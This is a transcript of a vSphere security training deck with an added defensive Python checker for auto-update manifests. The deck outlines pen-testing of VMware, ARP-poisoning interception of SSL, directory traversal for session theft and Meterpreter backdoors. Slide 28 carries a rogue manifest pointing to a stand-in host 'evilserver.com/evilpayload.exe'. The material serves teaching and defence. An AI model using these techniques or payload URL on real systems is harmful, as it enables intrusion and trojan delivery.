Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand

Upload: abraham-gray

Post on 17-Dec-2015
TRANSCRIPT

  • Slide 1
  • Slide 2
  • Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand.
  • Slide 3
  • vSphere: Just Another Layer to Attack? Recent Cases involving VMware; Pen Testing Methodology; GuestStealer; Tomcat Zero Day; Directory Traversal; VASTO; Mitigation Techniques; 3rd Party Mitigation Tools.
  • Slide 4
  • VMware: 80% of the Market Share. Do the tools used in pen testing work with virtualization? Are there hacks being designed just for VMware? What is this costing us?
  • Slide 5
  • CyberCrime and CyberWar Predictions for 2011, #2: Cloud Computing and Virtual Machines (VM) will be specifically targeted by cybercriminals and cyber terrorists, resulting in VM malware, Cloud downtime and Cloud data theft. (Hakin9 Issue 01/2011 (37))
  • Slide 6
  • What are the main security concerns associated with virtualization in general? Segregation of Duties; Accounting/Logging; New APIs (VMsafe, vStorage, vNetwork); VMsafe Virtual Appliances; Plug-Ins; Shared Resources (Memory, CPU, Datastore): can they be attacked?
  • Slide 7
  • vSphere Client APIs. Plugins: VMware Update Manager, Guided Consolidation, VMware Converter, Storage vMotion. 3rd Party Plugins: Backup Solutions (Veeam), RDP (the RDP plug-in, by Juxtaposition). Invoke Plugin Management Interfaces.
  • Slide 8
  • ESX and vCenter both use a Web Service. vCenter: on by default. Why? ESX: disabled. Thank God. Tomcat Web Service: how many holes have we found here? WOW. Utilizes a proxy; this is the same proxy used by hostd.
  • Slide 9
  • VMware is using an old version of Tomcat that leaves the username and password in a world-readable file! Fixed by a recent update for vCenter 4.1.
  • Slide 10
  • VMCI, or Virtual Machine Communications Interface, is an interface designed into the hardware of a VM. It provides communication between VMs and trusted endpoints on the host, and from VM to VM. The vmkernel is considered a trusted endpoint. This interface is implemented as a virtual PCI device, present by default in all VMs created with virtual hardware version 7. http://pubs.vmware.com/vmci-sdk/VMCI_intro.html
  • Slide 11
  • Threats: Perceived; Known Risks; Probability; Potential Impact.
  • Slide 12
  • Secunia Historic Advisories: ESX 4.x, ESXi 4.x, vCenter Server 4.x. nvd.nist.gov: over 40 vulnerabilities for VMware products. McAfee Threats: VMware ESX Server Heap Buffer Overflow; vCenter Update Manager CSS; vCenter Update Manager Directory Traversal.
  • Slide 13
  • 130 Million Credit Cards Stolen (Gonzalez Indictment): SQL Injection Attacks; SQL Injection Strings; Malware; Rootkits; Visiting the stores; Disabling the logs; Using Proxies. Little Known Fact: Occurred on VMware!!!!
  • Slide 14
  • This does not change, regardless of the environment being tested: Information Gathering → Scanning → Enumeration → Penetration. Fail: start over, or tell them great job. Succeed: Escalate Privileges → Steal Data or Leave Proof of Hack → Cover Tracks → Leave Backdoors.
  • Slide 15
  • Google; NMAP (since v4.8); Ettercap; Cain and Abel; Metasploit; VASTO (Virtualization ASsessment TOolkit) by Claudio Criscione.
  • Slide 16
  • Slide 17
  • Slide 18
  • We have to find the systems first. Just like any other service, ESX has its own tells. NMAP will give you what you need. Let's see this in action!
  • Slide 19
  • Yes, you can create your own modules. We will take a look at VASTO (Virtualization ASsessment TOolkit) by Claudio Criscione. Auxiliary Modules. Meterpreter: "The purpose of meterpreter scripts is to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation." (Metasploit) Meterpreter is an effective tool for creating backdoors.
  • Slide 20
  • ARP Cache Poisoning will allow us to perform a successful SSL crack! The hacking tools will create fake certificates. Two simultaneous SSL connections are established: one between the victim and the hacker, the other between the hacker and the real server. The communication process starts on port 443 and, once the SSL authentication has been established, VMware moves the communication to port 902. (Diagram: SSL request / SSL reply with a fake certificate on the victim side; SSL request / SSL reply with the real self-signed cert on the server side; the encrypted stream is cleartext at the hacker, who can copy & alter it or stop the ESX server.)
  • Slide 21
  • VIC Client Login
  • Slide 22
  • Slide 23
  • Slide 24
  • You are still vulnerable even if you use vCenter. I can offer this: once the above password is stolen, you can log in to the host with the vpxuser and the above password.
  • Slide 25
  • VULNERABLE VERSIONS. Server: VMware Server 2.x < 2.0.2 build 203138 (Linux); VMware Server 1.x < 1.0.10 build 203137 (Linux). ESX/ESXi: ESX 3.5 w/o ESX350-200901401-SG; ESX 3.0.3 w/o ESX303-200812406-BG; ESXi 3.5 w/o ESXe350-200901401-I-SG.
  • Slide 26
  • Thanks for the Virtual Machines! GuestStealer. How large is your dictionary file? Dictionary Attack. Need to know exactly what is running? Fingerprinting Tool.
  • Slide 27
  • Auto Update Process (client/server sequence diagram): 1. GET /client/clients.xml → AutoUpdate URL; 2. RetrieveServiceInstance → ServiceInstance; 3. RetrieveServiceStatus → Status; 4. GET /client/clients.xml → AutoUpdate URL, then Login. The manifest carries the values 3.0.0, 3.1.0 and https://*/client/VMware-viclient.exe.
  • Slide 28
  • The Auto Update Process: the legitimate manifest advertises 3.0.0, 3.1.0 and https://*/client/VMware-viclient.exe; The Evil Guy's manifest advertises 10.0.0, 3.1.0 and https://evilserver.com/evilpayload.exe.
  • Slide 29
  • Change the clients.xml filename. The package will run under the user's privilege! Administrator, anyone? Provide your nasty trojan package. Could be combined with other attacks. Create a fake web interface so you look legit! This can be done as MitM or Rogue Server. You will trigger a certificate error.
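A defender-side check for the auto-update step in slides 27 to 29, as an added example that is not part of the presentation, VMware's client or VASTO: it parses a constructed clients.xml-style manifest and flags a download URL that is not HTTPS on the host the client actually connected to, a path other than the installer path shown on the slide, or an implausible version jump like the 10.0.0 the rogue manifest advertises. The element names, the two sample manifests and the reading of `*` as the connected host are assumptions.

```python
"""Sanity-check a vSphere-client-style auto-update manifest before trusting it.
Constructed example: the XML layout approximates the clients.xml the slides
describe; element names are assumptions, not the real VMware schema."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

EXPECTED_PATH = "/client/VMware-viclient.exe"  # download path shown on the slide

# Constructed sample: what a legitimate server hands back (slide 27).
GOOD_MANIFEST = """<clientConnections><clientConnection>
  <version>3.0.0</version><exactVersion>3.1.0</exactVersion>
  <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
</clientConnection></clientConnections>"""

# Constructed sample: the manifest a rogue server or MitM substitutes (slide 28).
EVIL_MANIFEST = """<clientConnections><clientConnection>
  <version>10.0.0</version><exactVersion>3.1.0</exactVersion>
  <downloadUrl>https://evilserver.com/evilpayload.exe</downloadUrl>
</clientConnection></clientConnections>"""


def _major(version):
    """Leading numeric component of a dotted version, or -1 if unparsable."""
    try:
        return int(version.split(".")[0])
    except ValueError:
        return -1


def check_manifest(xml_text, connected_host, current_version="3.0.0"):
    """Return a list of findings; an empty list means the manifest looks sane.
    connected_host is the vCenter/ESX host the client actually connected to;
    the '*' in the slide's URL is assumed to be a placeholder for that host."""
    findings = []
    host = connected_host.lower()
    for conn in ET.fromstring(xml_text).iter("clientConnection"):
        url = (conn.findtext("downloadUrl") or "").replace("*", host, 1)
        parts = urlsplit(url)
        if parts.scheme != "https":          # plain HTTP would be trivially tampered
            findings.append(f"non-HTTPS download URL: {url}")
        if parts.hostname != host:           # payload must come from the server we spoke to
            findings.append(f"download host {parts.hostname!r} is not {host!r}")
        if parts.path != EXPECTED_PATH:      # only the known installer path is acceptable
            findings.append(f"unexpected download path: {parts.path}")
        advertised = conn.findtext("version") or ""
        if _major(advertised) > _major(current_version) + 1:   # 10.0.0 forces an "update"
            findings.append(f"implausible version jump: {current_version} -> {advertised}")
    return findings
```

This only vets the manifest; it does not replace verifying the server certificate, which is what the rogue-server and MitM variants on the slide rely on the user clicking through.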
  • Slide 30
  • Autopwn: how easy can it get? Uses a flaw in the Tomcat Web Server. Transfers the latest session file from vCenter using a Directory Traversal attack. Admin rights without knowing a username or password!
  • Slide 31
  • VMware vShield Zones. 3rd Party: Altor, Reflex, CheckPoint, Astaro Security Gateway, Tripwire, Catbird, HyTrust. Mitigation Tools: Best of Breed.
  • Slide 32
  • Slide 33
  • Slide 34
  • Trend Micro Deep Security provides advanced security for physical, virtual, and cloud servers and virtual desktops. Modules: Agentless Malware Detection for VMs; Deep Packet Inspection; Intrusion Detection and Prevention; Web Application Protection; Application Control; Bidirectional Stateful Firewall; Integrity Monitoring; Log Inspection.
  • Slide 35
  • Slide 36
  • Catbird TrustZones: policy-based security envelope for virtual infrastructures and the cloud. Enforces protection and measures compliance across virtual clusters and data centers. The Catbird virtual security appliance performs several functions: Hypervisor auditing; Virtual network IPS; Network segmentation and access control; Vulnerability management; Multi-tenant security; Reports to management console.
  • Slide 37
  • Catbird appliances collect data and enforce policies; appliances report events to the management console; the management console analyses events and correlates them to the compliance framework.
  • Slide 38
  • 1. Course Introduction and Methodology 2. Penetration Testing 101 3. Primer and Reaffirming our Knowledge 4. Security Architecture, vCPU, vMemory 5. Routing and the vNetwork 6. vStorage Architecture and Security Implementations 7. Hardening the Virtual Machines 8. Hardening the Host 9. Hardening Virtual Center 10. Virtualizing your DMZ 11. 3rd Party Mitigation Tools 12. Putting it all Together
  • Slide 39
  • 1. Course Intro & Methodology 2. Virtualization Overview 3. Planning & Installing ESX/ESXi 4 4. Using Tools to Administer a VMware Environment 5. Configuring Networking 6. Configuring Storage 7. vCenter Server 4 and Licensing 8. VM Creation and Configuration & Snapshots 9. Security and Permissions 10. Server and VM Monitoring 11. Advanced ESX and vCenter Management 12. Patching and Upgrading ESX/ESXi 13. Disaster Recovery and Backup 50 Hours of Training 6.5 Classes in ONE
  • Slide 40
  • Does vSphere really have some major issues? Recent Cases involving ESX; Pen Testing Methodology; Web Related Issues; VASTO; Mitigation Techniques. Questions?